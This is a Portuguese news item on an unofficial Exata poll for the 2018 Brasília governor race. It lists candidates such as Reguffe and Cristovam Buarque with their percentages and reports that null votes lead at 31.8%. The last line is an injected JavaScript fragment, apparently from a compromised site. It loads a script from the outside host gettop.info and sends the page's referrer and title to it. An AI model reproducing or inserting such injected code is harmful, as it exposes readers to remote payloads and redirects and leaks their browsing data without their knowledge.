Pesquisa extraoficial feita pelo instituto Exata traz um panorama da situação dos políticos brasilienses na corrida pelo Palácio do Buriti em 2018. Chama atenção o fato de só aparecerem nomes conhecidos dos eleitores. Lideram o ranking os senadores Reguffe (sem partido) e Cristovam Buarque (PPS). As informações foram divulgadas pelo blog Rádio Corredor, do jornalista Odir Ribeiro.
Ao todo, no entanto, quem está na frente, segundo o levantamento, são os eleitores dispostos a anular os votos. Enquanto Reguffe tem 15,3% das intenções, os nulos têm mais que o dobro: 31,8% – o que mostra o descrédito da classe política como um todo.
No levantamento, o governador Rodrigo Rollemberg (PSB), que sofre com a aplicação de medidas impopulares, tem o mesmo número que o peemedebista Tadeu Filippelli – que tem seu futuro nas mãos da Justiça.
Jofran Frejat (PR) e Érika Kokay (PT) aparecem em terceiro e quarto lugar. Com números menos expressivos, Rogério Rosso (PSD) e Izalci (PSDB), assim como Reguffe, não devem figurar entre os candidatos para o governo local.
Confira:
Reguffe (sem partido) – 15,3%
Cristovam Buarque (PPS) – 7,3%
Jofran Frejat (PR) – 6,8%
Érika Kokay (PT) – 6,5%
Fraga (DEM) – 4,3%
Alírio Neto (PTB) – 3,3%
Rodrigo Rollemberg (PSB)- 2,8%
Tadeu Filippelli (PMDB) – 2,8%
Izalci (PSDB) – 2,7%
Rogério Rosso (PSD) – 2,5%
Indecisos – 14%
Nulos – 31,8%
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;